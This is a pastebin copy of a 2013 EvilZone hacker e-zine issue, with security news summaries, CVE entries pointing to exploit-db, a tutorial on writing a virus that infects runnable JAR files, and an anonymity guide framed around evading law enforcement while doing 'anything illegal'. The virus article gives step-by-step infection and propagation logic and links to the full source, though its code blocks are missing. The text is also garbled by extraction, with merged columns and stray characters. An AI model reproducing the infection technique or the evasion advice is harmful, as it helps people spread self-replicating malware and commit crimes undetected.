· 10 years ago · Jul 06, 2016, 01:48 AM
1
2INDEX:
3EvilZone news – p.1
4High security news – p.2
5Code tricks and snippets – p.6
6Article of the issue – p.11
7Tool of the issue – p.21
8EvilZone release – p.24
9Official EvilZone magazine (aka EvilZine) made and maintained by the great EvilZone community supported by many great readers. Computer related riddles – p.25
10Creative art section – p.26 For the lulz – p.31
11EvilZone news
12EvilZone is slowly getting redefined with custom In addition to the new forum system, the next largforum software currently in development by ad est thing used by the EvilZone community after the mins. The transition date, from SMF to new forum forum, which is an IRC network, will also be transisystem, called "Project alpha", is unknown and it is tioned to a custom IRC daemon. Status of this prounclear whether it is soon or not. Not much detail ject is unknown and it is still in close development.
13can be disclosed at this time about how it will look and work but it will surely be one of a kind, a new era for EvilZone.
14High security news April 2013 by Mordred
15Legend: “from†refers to the origin of the news itself more as a title; “by†refers to the writer of the article
16
17Anonymous Hackers Plan to Target OPD
18
19A controversial arrest caught on camera is getting attention from another corner. Computer hackers are targeting the Omaha Police department. An Internet video from Anonymous says they've heard the desperate calls for change in Omaha after seeing the video of an arrest last week. Operation Omaha, as it's called, is targeting the police department. “I think the paranoia they create will probably be worse than the damage they do to people's accountsâ€, said Miah Sommer of Omaha. OPD is taking the threat of a database breach very seriously. Dotcomm, which oversees the city and county computer systems, tells Channel Six News: “We're taking all necessary precautions and, at this time, have no reason to believe there has been any successful hack against the OPD websiteâ€.
20
21Source - From and by www.wowt.com
22
23Feds Not “Forthright†About Fake Cell Tower Devices
24
25According to new Justice Department e-mails obtained by the American Civil Liberties Union (ACLU) of Northern California, and published on Wednesday, federal investigators have been routinely using stingrays to catch bad guys. A stingray is a device that can create a false cell phone tower, and allows authorities to determine a particular mobile phone’s precise location. Stingrays aren't new, law enforcement agencies nationwide are believed to have been using them for years. But one e-mail in the new trove reveals something brand-new: that the Feds were not fully clear about the fact that they were specifically using stingrays (also known as “IMSI catchersâ€) when asking for permission to conduct electronic surveillance from federal magistrate judges. A press representative from the United States Department of Justice did not respond to a request for comment. Groups like the ACLU are concerned that unsupervised use of such technology can inadvertently collect information of people who are not suspected of any crime, nor under investigation.
26
27Source - From and by www.arstehnica.com
28
29When Spammers Go to War: Spamhaus DDoS
30
31Over the last ten days, a series of massive denial-of-service attacks has been aimed at Spamhaus, a not-for-profit organization that describes its purpose as “track[ing] the Internet's spam operations and sources, to provide dependable realtime anti-spam protection for Internet networksâ€. These attacks have grown so large, up to 300Gb/s, that the volume of traffic is threatening to bring down core Internet infrastructure. The New York Times reported recently that the attacks came from a Dutch hosting company called CyberBunker (also known as cb3rob), which owns and operates a real military bunker and which has been targeted in the past by Spamhaus. The spokesman who the NYT interviewed, Sven Olaf Kamphuis, has since posted on his Facebook page that CyberBunker is not orchestrating the attacks. Kamphuis also claimed that NYT was plumping for sensationalism over accuracy. Sven Olaf Kamphuis is, however, affiliated with the newly organized group STOPhaus. STOPhaus claims that Spamhaus is “an offshore criminal network of tax circumventing self declared Internet terrorists pretending to be 'spam' fighters†that is â€attempt[ing] to control the Internet through underhanded extortion tacticsâ€. STOPhaus claims to have the support of “half the Russian and Chinese Internet industryâ€. It wants nothing less than to put
32Spamhaus out of action, and it looks like it's not too picky about how that might be accomplished. And if Spamhaus won’t back down, Kamphuis has made clear that even more data can be thrown at the anti-spammers.
33
34Source - From and by www.arstehnica.com
35
36Russian Underground vSkimmer Botnet Targeting Payment World
37
38A new botnet has emerged from the underground and is menacing the payment world. The cyber threat dubbed vSkimmer comes from Russia, according to revelations of the McAfee security firm. The security expert Chintan Shah wrote in a blog post that whilst monitoring a Russian underground forum, he found a discussion about a Trojan for sale that can steal credit card information from Windows PCs for financial transactions and credit card payments. The vSkimmer agent is able to detect card readers on the victim’s machine and gather all the information from the Windows machines so that afterwards it can send it to a remote control server by encrypting it (Base64). The malware collects the following information from the infected machine and sends it to the control server:
39
401. Machine GUID from the Registry
412. Locale info
423. Username
434. Hostname
445. OS version
45
46The vSkimmer malware is indicated as being the successor of the popular Dexter, a financial malware that targeted Point-of-Sale systems to grab card data as it transmitted during sales flow. Dexter is responsible for the loss of nearly 80,000 credit card records and data breach of payment card data of Subway restaurants in 2012. According security researchers at McAfee, vSkimmer appeared in the underground forum since February and it could be an ongoing project. Exactly as its predecessor, Dexter, vSkimmer is completely undetectable on the compromised host. “vSkimmer can also grab the Track 2 data stored on the magnetic strip of the credit cards. This track stores all the card information including the card number.†To be precise on Track 2 you can find stored the card number, the three-digit CVV code and the expiration date, all necessary items in order to qualify a card for a payment process.
47
48Source - From and by www.thehackernews.com
49
50
51
52Expanding Internet Snooping Powers a 'Top Priority'
53
54Discussing the “going dark†phenomenon at the American Bar Association last week, FBI general counsel Andrew Weissmann said that proposing new laws to let law enforcement get real-time access to cloud-based online communications will be “a top priority this yearâ€, as reported by Slate. He argued the FBI should have the power to tap not just phone calls and e-mails stored on a users' computer, but also cloud-based services such as Gmail, Dropbox, Skype and the chat features in online games, where he said chat features are “being used for criminal conversationsâ€.
55
56Source - From and by www.mashable.com
57
58Parastoo Warns Free Software License Killers
59
60An e-mail sent by the hacking group Parastoo to the license violation e-mail address of the GNU Project states that two major Satellite Developer companies based in the U.S. have been found to be involved in extreme numbers of FSF and alike licenses violations. The U.S.G. and Army contractors for sensitive projects around the globe are allegedly infringing the aforementioned GNU rules for various purposes including but not limited to weapons development and drone manipulation. Parastoo have not released any more information on the matter, however their e-mail states: “<snip> in an upcoming release, <snip> we will provide more than enough technical details in our report so that assumption is many people will easily confirm, document and refurbish it for you to be used in a court of Law. <snip> This message was intended to give you a heads up for 7th Aprilâ€. It seems on April 7th there will be a release from Parastoo which will include the details on the alleged licensing infringement.
61
62Source - From www.cryptome.org by Mordred
63
64Oracle Blocks Traffic from Iran
65
66A report has emerged stating that Oracle is blocking access to its sites from Iran. The block could mean that any Iranian servers that are using Oracle will be unable to update their systems, at least by conventional methods, leaving them exposed and vulnerable to zero-day and breaking exploits. It is also interesting that the URL states that there appears to be an embargo. Perhaps this is an indication of the promised, stiffer sanctions by the US against Iran, though there is little evidence to indicate there has been such a sanction that applies to the Internet and American-based web sites. On the other hand, it is notable that there have been cyber-operations against Iran, thought they were not exactly attributed to the U.S. This may be a prelude to some type of exploit. A visit to the page from Iran gives the user the message from the following URL and message:
67 www.oracle.com/splash/rpls/embargoed.html
68
69In compliance with U.S. and applicable export laws we are unable to process your request. Please contact RPLS-Ops_ww@oracle.com if you believe you are receiving this notice in error.
70
71Source - From and by www.siliconangle.com
72
73Activists Now Targeted with Trojanized Backdoor Apps
74
75Phishing e-mails targeting Tibetan and Uyghur activists and containing spying malware masquerading as legitimate DOC and PDF files are nothing new, as such spam campaigns have been going on for years. But it seems that the attackers have finally recognized the fact that many users often access their e-mails via their mobile phones, as Kaspersky Lab researchers have recently spotted Uyghur-themed e-mails delivering a malicious program for Android. The offered app is, in fact, a backdoor. Once the user installs and launches it, it presents information about the World Uyghur Congress mentioned in the e-mail, but in the background it contacts a C&C server located in the U.S. and notifies it of the successful infection. The Trojan then proceeds to harvest information from the device such as contacts, call logs, SMS messages, geo-location and general phone data (phone model, number, OS and version, etc.) and posts it to the C&C server. Both the fact that the source code of the Trojan is peppered with remarks in Chinese and that the
76C&C server's IP used to be associated with a domain recently registered by someone (ostensibly) located in Beijing, seems to point to Chinese-speaking attackers. In addition to this, the C&C index page and its publicly accessible interface are also written in Chinese, and its server is running Windows Server 2003 configured for the same language, the researchers point out. According to the researchers, the spam e-mail delivering the Android Trojan has been sent from a compromised e-mail account of a Tibetan activist, trying to exploit the trust existing between Tibetan and Uyghur activists. “Until now, we haven't seen targeted attacks against mobile phones, although we've seen indications that these were in developmentâ€, they say, adding that this is perhaps the first in a new wave of targeted attacks aimed at Android users. Needless to say, users can easily thwart the attack by not installing and running APK attachments even when they seem to come from trusted sources.
77
78Source - From and by www.net-security.org
79
80MySQL (Linux) Database Privilege Elevation Zeroday Exploit
81
82CVE-2012-5613: MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a and possibly other versions, when configured to assign the FILE privilege to users who should not have administrative privileges, allows remote authenticated users to gain privileges by leveraging the FILE privilege to create files as the MySQL administrator. NOTE: the vendor disputes this issue, stating that this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation. NOTE: it could be argued that this should not be included in CVE because it is a configuration issue.
83
84Exploit available at: http://www.exploit-db.com/exploits/23077
85
86Source – From and by http://cve.mitre.org and http://www.exploit-db.com
87
88Java CMM Remote Code Execution
89
90CVE-2013-1493: The colour management (CMM) functionality in the 2D component in Oracle Java SE 7 Update 15 and earlier, 6 Update 41 and earlier, and 5.0 Update 40 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (crash) via an image with crafted raster parameters, which triggers (1) an out-of-bounds read or (2) memory corruption in the JVM, as exploited in the wild in February 2013.
91
92Exploit available at: http://www.exploit-db.com/exploits/24904
93
94Source – From and by http://cve.mitre.org and http://www.exploit-db.com
95
96This paper explains how to create a virus that infects runnable Java Archive Files (JAR), while preserving their functionality. I invented this technique, but I think it is something you can easily come up with once you know how a JAR works.
97
98The emphasis lies on the infection technique, not on doing harm or hiding the virus from detection, which would be a whole topic by itself.
99
100The Java Archive File
101
102At first you need to know how your host program actually works to preserve the functionality of the host. A
103JAR file is a ZIP file with the file ending .jar and a file named MANIFEST.MF in it. The JAR usually contains Java Bytecode. A runnable JAR has an entry in the MANIFEST.MF that tells the Java Runtime which class contains the main method, so that it knows where to start the execution.
104
105
106A typical manifest resides in the folder META-INF and looks like this:
107
108
109The entry Main-Class tells here that the main method can be found in gui/AppStarter.class within the JAR. Knowing that the JAR file is just a ZIP, you can also handle it like this and extract it with i.e. 7zip.
110
111
112The JAR Infection Technique
113
114To infect a JAR, the virus has to update the JAR with its own .class files and change the manifest Main-Class entry so that the virus is executed. But it also has to preserve the old Main-Class entry in order to execute the host, when the host is run.
115
116So these are the steps in an overview:
117
1181. Look for JAR files.
1192. For every JAR do: If JAR not infected, go on with next steps.
1203. Change the manifest Main-Class entry to the virus main class.
1214. Copy the virus .class files into the JAR.
1225. Save the old manifest entry somewhere in the JAR.
1236. Execute the own host by looking at the preserved manifest entry.
124
125Step 1: Looking for JAR Files
126
127Basically you can try to either search for files with a ".jar" ending or you make it more robust and check if it actually is a ZIP with a manifest in it.
128
129For the latter you can use the following method to determine if the file is a ZIP:
130
131
132
133First you make sure the file is no directory, afterwards you check if the first 8 bytes of the file are the MACIG_NUMBER. That number is the file signature for ZIP.
134
135Here you can find a huge list of file signatures: http://www.garykessler.net/library/file_sigs.html
136
137Step 2: Determine Infection
138
139You don't want to infect files twice, so you need a method to determine whether a JAR already has been infected. I figured, I would just compare the Main-Class entry in the manifest. If it equals the virus entry, it is already infected.
140
141
142- hostEntry is the entry point of the file to be infected.
143- JarVir.class.getName() returns the entry point of the virus. If they are equal, the JAR is already infected.
144
145The Jarchiver is a helper class for the virus that provides functions for updating JAR and reading the manifest.
146
147
148
149
150
151Here is how the Jarchiver reads the entry point of the manifest:
152
153
154
155
156
157
158Step 3: Updating the Manifest
159
160 We use the Jarchiver again to update the manifest Main-Class entry with the main class of the virus:
161
162It looks like this in the Jarchiver:
163This doesn't change the manifest on disk already, but in memory. When updating the JAR in the next step the new manifest is written into it.
164
165Step 4: Updating the JAR
166
167This turned out to be not that straight forward, because in order to update a JAR you have to create an entirely new JAR and replace the old one with the new file.
168
169This is what the virus does:
170It gets the location of the own .class files and the names of them that shall be copied into the host and it provides the old entry point of the host (meaning the host class that contains the main method).
171
172
173
174
175The own entries are the two virus .class files to be written:
176
177
178
179
180
181
182And you get the location of the currently running JAR like this:
183(<—)
184You need this location and the entries to copy the virus into the new host file.
185
186
187Why don't just copy the whole JAR?
188Because the virus will operate from host JAR files which contain more than just the virus itself. So you only copy the virus files into new hosts and not more.
189
190The Jarchiver updates the JAR like this:
191
192Those are quite a few steps, so let's make this a bit more clear:
193The Jarchiver creates two InputStreams, one for the JAR that has to be infected (jin) and one for the JAR the virus is currently running in (ownIn). It creates an OutputStream (jout) to write an updated copy of the JAR, that contains virus, host and a note with the main class of the host. Afterwards it replaces the old JAR file with the updated one.
194
195Here are the methods copyHost and writeInFiles in detail:
196
197
198
199Both use writeJarEntry, which writes exactly one entry to the specified output stream.
200
201Step 5: Save the old entry point of the host
202
203To preserve the entry point of the host the method writeHostName writes a files with the hostname string into the JAR:
204
205
206this will be read by the virus upon execution of the new host file.
207
208
209Step 6: Execute the own host
210
211The virus that has just infected other host files, still has to execute the host of the JAR it is currently running in. This step was the most difficult for me, because I never had to use reflection before.
212
213The problem is that we only have a name of a class. We do not have direct access to the class or its main method. So we need to use reflection to get the class and execute the main method.
214
215This is done here:
216
217
218
219In order to get to know more about reflection in Java, read this:
220http://docs.oracle.com/javase/tutorial/reflect/index.html
221
222getHostName reads the entry point of the host from the file that we saved in there. It has to read that text file, while it is in the JAR, which you can do like this:
223
224
225
226
227And that's it. Because this virus infects JAR files, it is able to work on all platforms that have a JVM.
228
229You can find the whole code of the virus and an example output here: http://goo.gl/f3CkG
230
231Short url to the article online: http://goo.gl/DQZlz
232
233In This Tutorial:
234
235ï€ªï€ Browser Security
236ï€ªï€ Local Net Security
237ï€ªï€ Encryption/Logs
238ï€ªï€ Virtualization Software/LiveUSB
239ï€ªï€ IP Address
240
241What You Will Need:
242
243ï€ªï€ A brain
244ï€ªï€ A computer
245ï€ªï€ The ability to read
246ï€ªï€ Wireshark (not absolutely necessary)
247ï€ªï€ Linux. There's already plenty of Windows
248tutorials out there.
249Let's Get Started!
250
251First of all, I realize that there are already a few anonymity tutorials in our wonderful Anonymity section. However, I realized today that they are incredibly generic and are practically duplicates of the hundreds of other generic tutorials out there littering the net. So, I decided to write one that is a little bit more inclusive. I would also like to add that there is not one tutorial out there that will provide you with absolutely all the information you will need to be 100% anonymous. In fact, I don't think that you even can be 100% anonymous. Keep that in mind, and always be paranoid.
252
253Browser Security
254
255Chaining 35 proxies won't do you any good if you overlook other aspects of being anonymous. As far as I'm concerned there's a few keys points to browser security:
256
257 A) User Agent:
258
259If you don't already know what this is then you should probably come back to this tutorial later in life. But just in case:
260
261 "The term was coined in the early days of the Internet when users needed tool to help navigate the Internet. Back then, the Internet was (an actually still is) completely text-based, and to navigate the text, text commands needed to be typed into a keyboard. Soon tools were developed to be the users 'agent', acting on the user's behalf so that the user didn't have to understand the cryptic commands in order to retrieve information. Today, nearly everyone uses a web browser as their user agent." - http:// whatsmyuseragent.com/WhatsAUserAgent
262
263Obviously this can be indentifying, especially if you have a rather unique one. In older versions of Firefox you were able to go into the about:config and permanently edit your user agent. I don't think you can do that now. So instead, I would recommend getting an add-on to take care of this. There are plenty of them, but my favourite one is "Override User Agent" (http://goo.gl/1FKJd) because it seems to have the most choices. Everything from Safari to Opera to Internet Explorer to Mozilla to Mobile user agents. You can even make it appear as though you are a Google Bot. Too easy.
264
265You can do this in most major browsers and it will almost always come in the form of an add-on.
266
267
268B) Referrer Url:
269
270This one seems to be rather overlooked. This is an HTTP header field that can be used to track your path from page to page. This one is also a simple fix. At least in Firefox. All you have to do is, once again, go to the about:config and search for network.http.sendRefererHeader. Once you've found it just set it to a value of 0. That takes care of that. You can also use the add-on RefControl.
271
272In Chrome you can check this out: http://goo.gl/hOja2
273
274If you are using Internet Explorer then... Well then you should just go away.
275
276
277C) Cookies:
278
279Cookies are used to track your web activities. Don't think that just because you are using Tor you are safe from this. As usual there is a plethora of add-ons that you can use. You can also set your browser to not accept cookies from sites, however, you may find that you won't be able to access certain sites if you do this. At least make sure that you remove cookies when you are done with your session. This can be done in Firefox:
280 Prefs > Privacy > Show Cookies > Remove All Cookies.
281Obviously that's for Firefox. In Chrome it's something like:
282 Chrome > Tools > Clear Browsing Data.
283For Opera it would be:
284 Settings > Preferences > Advanced > Cookies.
285
286For those of you who don't know there is such a thing as long-term cookies. Otherwise known as LSO's (Local Shared Objects). These are flash cookies. As far as I know they aren't removed when you do the cookie removing steps I mentioned above. You can handle these by getting the add-on called "BetterPrivacy" (http://goo.gl/6mLd9).
287
288I hope I don't have to tell you guys to clear your history or use Private Browsing. Oh! and one more note that I'm not going to make a title for. Be aware of the Desktop and Web Browser extensions you are using. For example, weather monitoring extensions could be very bad because they may transmit zip codes or address information to get local weather reports. Many people overlook this. Hiding your IP won't matter if you overlook this.
289
290
291
292 D) Other good add-ons:
293ï€ªï€ Adblock Plus (http://goo.gl/ZvffD) -- Can be used for Firefox, Chrome, Opera and Android.
294ï€ªï€ HTTPS Everywhere (http://goo.gl/TKQrW) -- Encrypts your communications with over 1000 websites.
295Unless you're taters I'm sure most of you are already using this ;)
296ï€ªï€ Ghostery (ghostery.com) -- See what's tracking you on a site to site basis. Block them if you wish.
297ï€ªï€ TrackMeNot (http://goo.gl/foDkN) -- I really like this one. This one spoofs your searches. For example, currently it looks like I'm browsing for dogs. When instead I might be browsing: How to be a terrorist.
298ï€
299
300 No Script (noscript.net) -- Oh come on.
301 E) Startpage:
302
303Also, for those of you who don't like Google for obvious reasons, check out Startpage (startpage.com). It sends your searches to their own server before actually sending it out to the web to help hide who's searching. It's a lot like Ixquick except that it yields better results. They don't log your IP.
304
305
306::Local Net Security
307
308If you aren't worried about your local network identifying your machine then I wouldn't worry about this section. Still, it's good to know.
309
310
311 A) MAC Address:
312
313Your MAC address is a 48bit hardware identifying address which is part of your network card. Everyone has one and they are all unique. Again, this doesn't cross router boundaries so there are many situations when spoofing this doesn't matter. There are a few ways to spoof this. This first way being manually. The basic syntax for this is:
314
315ip link set wlan0 down <--- to bring down the interface temporarily, otherwise it won't work; ip link set wlan0 hw ether ff:ff:ff:ff:ff:ff <--- don't use that one;
316
317Then you have to reconfigure the interface. Simply running ip link set wlan0 up (or ifconfig wlan0 up) won't work.
318
319The easier way is just to do this with macchanger.
320
321$codebowl> macchanger --help
322Usage: macchanger [options] device
323
324 -h, --help Print this help
325 -V, --version Print version and exit
326 -s, --show Print the MAC address and exit
327 -e, --endding Don't change the vendor bytes
328 -a, --another Set random vendor MAC of the same kind
329 -A Set random vendor MAC of any kind
330 -r, --random Set fully random MAC
331 -l, --list[=keyword] Print known vendors
332 -m, --mac=XX:XX:XX:XX:XX:XX Set the MAC XX:XX:XX:XX:XX:XX
333
334Generally I prefer to do macchanger -r wlan0 . Don't forget to run ip link set wlan0 down first.
335If you want to run this at start-up, you could write a little bash script and sym-link it like so:
336ln -s /etc/init.d/script.sh /etc/rcX.d/K10script.sh
337
338
339 B) DHCP:
340
341Many people are aware of the MAC address and that spoofing it might be a good idea. Not everyone considers this though. Your DHCP client will often transmit some information when requesting an IP address.
342Much of the time this only includes your hostname and MAC address (which you now know how to spoof). Unless your hostname is: twinkletits@hackingboxDumbassvilleOregon123herpderpLane
343Then you should be fine.
344
345
346Unfortunately, at least in the case of DHCPcd for you Gentoo and Arch users, it transmits a hell of a lot more. It will transmit your hostname, DHCPcd version, Kernel, OS and architecture. This is known as your vendor class id. Which is obviously very identifying. This can be taken care of by editing your /etc/ DHCPcd.conf file.
347
348So, for example instead of having your actual hostname and vendor class id to be transmitted, you can change it to whatever you want. Now, here's where you might want Wireshark. Set your filter to bootp and
349hostname imatransvestite
350vendorclassid isc-dhclient-V3.1.3:Linux-2.6.32-45-generic-ubuntu:x86
351
352
353::Encryption/Logs
354
355There are a few kinds of encryption.
356
357A) Stacked Encryption:
358
359This is a when an encrypted filesystem is stacked on top of an existing filesystem. This causes all files written to the encrypted folder to be done so "on the fly" before being written to disk. Example software: ï€ªï€ eCryptfs
360ï€ªï€ EncFS
361
362B) Block Device Encryption:
363
364This, on the contrary, is written below the filesystem layer to make sure that everything written to a certain block device is encrypted. Example software:
365ï€ªï€ dm-crypt + LUKS
366ï€ªï€ TrueCrypt
367
368
369C) Example Encryption Schemes:
370
3711. Simple Data Encryption -- Would include an encrypted folder in /home. Might be encrypted in EncFS or TrueCrypt.
3722. Simple Data Encryption (external device) -- Would include an entire external device encrypted with TrueCrypt.
3733. Partial System Encryption -- Would include the home directories encrypted, perhaps with eCryptfs. SWAP and /tmp separate partitions encrypted with dm-crypt + LUKS.
3744. System Encryption -- If using TrueCrypt you can't do this in Linux.
3755. Paranoid System Encryption -- A rather clever idea. The entire hard drive is encrypted with dm-crypt + LUKS, and the /boot partition is on a separate USB stick. You would have to be freshly installing to do this because I highly doubt that any of you set up your /boot partition to be on a separate USB stick. This way, you can't even boot the OS without the USB.
376
377Be sure that anything sensitive you may have is NEVER stored in an unencrypted area. I recommend always having at least one encrypted folder, if not an entire device, on an external drive. That way it is entirely off of your computer. If you accidentally happen to save something in an unencrypted area, don't think that deleting it is good enough. Every *nix should have a built in shredding command.
378
379$codebowl> man shred NAME
380 shred - overwrite a file to hide its contents, and optionally delete it
381 SYNOPSIS shred [OPTION]... FILE...
382
383DESCRIPTION
384 Overwrite the specified FILE(s) repeatedly, in order to make it harder
385Usage: shred [OPTION]... FILE...
386Overwrite the specified FILE(s) repeatedly, in order to make it harder for even very expensive hardware probing to recover the data.
387
388Mandatory arguments to long options are mandatory for short options too.
389 -f, --force change permissions to allow writing if necessary
390 -n, --iterations=N overwrite N times instead of the default (3)
391 --random-source=FILE get random bytes from FILE
392 -s, --size=N shred this many bytes (suffixes like K, M, G accepted)
393 -u, --remove truncate and remove file after overwriting
394 -v, --verbose show progress
395 -x, --exact do not round file sizes up to the next full block; this is the default for non-regular files -z, --zero add a final overwrite with zeros to hide shredding
396 --help display this help and exit
397 --version output version information and exit
398
399I would recommend at least using the u and z flags. If you want to shred the contents of an entire directory you can run this command: 'find -type f -execdir shred -uvz '{}' \;'
400
401 C) Logs:
402
403Logs can let someone know what you have been doing on your system. Some common places for logs and temporary data in Linux are:
404ï€ªï€ /tmp
405ï€ªï€ /var/tmp
406ï€ªï€ /var/logs
407ï€ªï€ /home (hidden files and folders)
408
409I would be careful about what you go doing in these directories. Destroying certain files could do serious damage to your operating system. Something else I would watch out for is your swap partition. Data could be saved here if you happen to use swap. This data could be retrieved even though you may not be aware of it. If you have the RAM I would recommend not even making a swap partition. Alternatively, you could mount your RAM and swap as /tmpfs and they will be cleared at shutdown. You can easily do this in your /etc/ fstab.
410
411::Virtualization Software/liveUSB
412
413To be quite honest, I wouldn't worry TOO much about logs. A better idea is to just not do anything illegal on your main OS. There are alternatives.
414
415
416 A) Virtualbox/VMware:
417
418A good idea is to install some anonymity based OS (or any OS for that matter) in a virtualization software of your choosing. Doing this keeps a lot of sensitive information such as logs and whatnot off of your main OS. Think of it as keeping all your dirty underwear in one tiny basket. I'm not going to teach you how to create a virtual machine here because, it's easy. What I will say is that if you are going to do this you should do it the right way. My recommendation is to follow these steps:
419
4201. Encrypt an external device. Preferably not a USB. You'll probably need something with more room.
4212. Before you create the virtual machine, plug in your external and unlock it (since you encrypted it).
4223. Set the path of the virtual machine in your settings to the path of the encrypted device. Doing so will make it so that the only way to access your virtual machine is if the device is plugged in and unlocked.
4234. For extra security use a couple of key files. Use a few .jpeg or .mp3 files on yet another external device.
424That is, if you're paranoid enough. Some good operating systems for doing this might be:
425ï€ªï€ Virtus (http://goo.gl/4SOFm) (although it runs on Ubuntu 11.10 so maybe not).
426ï€ªï€ Whonix (http://goo.gl/VeWcW)
427
428Whonix is built specifically for Virtualization software. You cannot install this on your actual computer. Due to the way it's built DNS leaks are impossible.
429
430
431 B) LiveUSB:
432
433Using virtualization software is a good practice. However, it IS still on your actual computer. Yet a safer way would be to create a LiveUSB. You can do this with UNetbootin, LinuxLive USB Creator (LiLi) or the dd command: dd if=/path/to/iso of=/dev/sdX
434
435Create it with no persistence. What is persistence you ask? Persistence is when any settings or modifications you make on a LiveUSB stay, or, persist every time you start up the LiveOS.
436
437The downside to creating a USB with no persistence is that every time you decide to boot it up, any settings you may wish to have (such as many of the settings I mentioned in the tutorial so far) will have to be done every single time. However, the upsides I think outweigh the downsides. Basically, a LiveUSB with no persistence is like booting into a fresh install of an operating system every time. So on those warm summer days where you feel like talking a relaxing walk to the public library, sitting down with a cool drink, and hacking the Gibson, you can! Just pop in your LiveUSB and hack away! Ok, don't really do that. But you get my point. This way when you are done you just yank the thing out and the next time you boot it up it will be like nothing ever happened on the LiveUSB. If you are going to do anything really serious, this is a good option. Good operating systems for this might be:
438ï€ªï€ Privatix (http://goo.gl/bnNNg)
439ï€ªï€ Liberte (http://goo.gl/QywUk)
440ï€ªï€ Tails (http://goo.gl/AjVhY)
441
442Really though you can use any operating system you want. These are just some examples of anonymity based operating systems.
443
444::IP address
445
446Ok, ok fine. I'll talk about hiding your IP. I'm not going to go quite as in depth as I may have with the other sections of this tutorial because this is only one part of being anonymous that people get too hung up on. Not that it's not important. People seem to think this is all you have to do to be anonymous though, and they are wrong. But, it wouldn't be a complete anonymity tutorial without this part now would it?
447
448
449 A) Proxies:
450
451 "In computer networks, a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource available from a different server and the proxy server evaluates the request as a way to simplify and control its complexity. Today, most proxies are web proxies, facilitating access to content on the World Wide Web." - Wikipedia.
452
453Ah yes. Proxies. Some of them log, and some of them don't, but how the hell do we know which ones do and don't? Hard to tell really. There are a few main different kinds of proxies.
454
455ï€ªï€ Transparent Proxies -- Simply put, a transparent proxy is no good for doing anything illegal. Your IP address is logged and shown. Although these may have the advantage of being a bit faster.
456ï€ªï€ Anonymous Proxies -- These hide your IP address. One downside is that anything you may connect to can probably tell that you are using a proxy. Which may cause problems for you in many cases.
457ï€ªï€ Elite Proxies -- These hide your IP and may hide the fact that you are using a proxy at all. Which can be beneficial. These often times will be the slowest.
458
459
460
461WARNING: Never assume that any proxy is not logging. Even if they say they aren't.
462
463A good thing to look at is the country it is in. You should never use a proxy that is in the same country as you. If you've done something worth trying to track you down for, law enforcement won't have any trouble doing so if you used a proxy in your country. What you want to do is figure out which countries have the best privacy laws. Or which ones have the worst so you can avoid them. As far as I know, Sweden has very good privacy laws. China or North Korea however, have shitty ones. The US isn't really the best for internet privacy either. So choose wisely.
464
465Another thing to look at is the different kinds of protocols a proxy may use. Two of the most important ones are HTTP Proxies and SOCKS Proxies. People end up using HTTP proxies by default much of the time.
466
467SOCKS Proxies are lower-level than HTTP Proxies. SOCKS uses a network handshake to send information about a connection. The SOCKS proxy then opens a connection, perhaps through a firewall. HTTP Proxies are transported over TCP and forwards an HTTP request through the HTTP server.
468
469Some SOCKS Servers include:
470ï€ªï€ Dante (http://www.inet.no/dante/)
471ï€ªï€ Ss5 (http://ss5.sourceforge.net/)
472ï€ªï€ Nylon (http://goo.gl/FnQVv)
473ï€ªï€ sSocks (http://ssocks.sourceforge.net/)
474
475A simple Google search will yield you some up to the minute proxy lists.
476
477 B) VPNs:
478
479 "A virtual private network (VPN) extends a private network and the resources contained in the network across public networks like the Internet. It enables a host computer to send and receive data across shared or public networks as if it were a private network with all the functionality, security and management policies of the private network. This is done by establishing a virtual point-to-point connection through the use of dedicated connections, encryption, or a combination of the two." - Wikipedia.
480
481There's a major difference between proxies and VPNs. That difference is anonymity vs. privacy. The best way I can explain this is that anonymity means that someone is sticking his nose in all of the birthday cakes, whereas privacy means that Timmy is in the room with all the birthday cakes, but no one knows what he's doing in there. Keep in mind:
482
483 proxy == anonymous (more or less)
484 VPN == private (Virtual PRIVATE Network)
485
486Generally you can guess that the paid VPN's are going to be more reliable than the free ones, given that you aren't an idiot who paid for it with your personal credit card and your real name. Again, be aware of where the VPNs are located. So if you are in the US, maybe don't use OpenVPN for anything illegal. Their headquarters are located in California.
487
488
489 C) Proxy Chaining:
490
491All I can say here is Proxychains. It's a very useful tool and it's easy to use. With this tool you can chain proxy to proxy, proxy to VPN, proxy to VPN to Tor (if you want), proxy to proxy to proxy to proxy to proxy to VPN to proxy. But let's not get to excessive.
492
493You will need to take a look at /etc/proxychains.conf. There isn't a man-page for it, all the directions you need are located in the configuration file. Basically what you do is add whatever proxies or VPNs you may want (make sure to note the IP and the port number) and you add them after this part:
494[ProxyList]
495# add proxy here ...
496# meanwile
497# defaults set to "tor" socks4 127.0.0.1 9050
498
499The proxies you add should be in this format: type host port
500
501So for example: socks4 198.10.23.100 80
502
503Then you run the Proxychains program: proxyresolv targethost.com
504
505 D) Other Techniques:
506
507Evidently one of the best ways to remain anonymous is to code your own proxy server, say a SOCKS server, and use other people's personal machines as proxies. This way you can be absolutely sure that they don't log. There is also Botnet proxies if you feel like coding yourself a botnet. This is outside the scope of this tutorial however.
508
509::Check Yourself Sites :Anonymous Emailing
510 ï€
511ï€
512ï€ªï€ http://whatsmyuseragent.com/ http://www.whatsmyip.org/ http://www.dnsleaktest.com/
513ï€
514ï€
515ï€ªï€ https://www.silentsender.com/ http://www.sendanonymousemail.net/ https://www.guerrillamail.com/
516 ï€ªï€ http://deadfake.com/Send.aspx
517 ï€ªï€ http://www.mailinator.com/
518 ï€ªï€ https://meltmail.com/
519::Final Notes
520
521This tutorial was inspired by all of the generic, useless, copy/paste anonymity tutorials out there. You know which ones I'm talking about. The ones that say:
522
523 "Here's a link to CyberGhost and what VPN's are, here's a proxy list, use Truecrypt, make sure to clean up with CCleaner, watch out for viruses/trojans/malware, here's some links to Anti-Viruses. Fully anonymous!"
524
525To all those tutorials out there, thank you for motivating me to write this. This one's for you.
526
527As I've said before, there is not one tutorial out there that will make you completely anonymous. Being completely anonymous is next to impossible. You can take as many precautions as you want but if the NSA is looking for you, it doesn't matter how secure your TrueCrypt password is and how many key files you have.
528
529
530If you are important enough they won't really need to crack your password. They'll just beat it out of you. Besides many of the techniques I've outlined, being anonymous is common sense:
531ï€ªï€ Don't link your real email with you hacker identity.
532ï€ªï€ Don't talk/brag about crimes you've committed.
533ï€ªï€ Use SSL with IRC.
